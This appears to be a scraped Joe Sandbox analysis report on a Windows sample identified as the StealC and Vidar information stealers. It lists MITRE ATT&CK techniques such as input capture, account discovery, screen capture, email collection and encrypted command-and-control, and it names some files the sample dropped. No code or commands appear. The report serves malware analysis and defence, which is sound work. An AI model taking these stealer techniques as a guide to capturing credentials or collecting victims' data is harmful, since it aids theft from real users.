Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report g77dRQ1Csm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFCFHJJECAEHJJKEHIDBKEHJKJ

C:\ProgramData\DTBZGIOOSO.docx

C:\ProgramData\EGIDAAFIEHIEHJKFHCAE

C:\ProgramData\FIIDBKJJ

C:\ProgramData\JDDHMPCDUJ.xlsx

C:\ProgramData\KATAXZVCPS.xlsx

C:\ProgramData\KEBGHCBA

C:\ProgramData\KEBGHCBAEGDHIDGCBAECGIECGH

Windows Analysis Report
g77dRQ1Csm.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre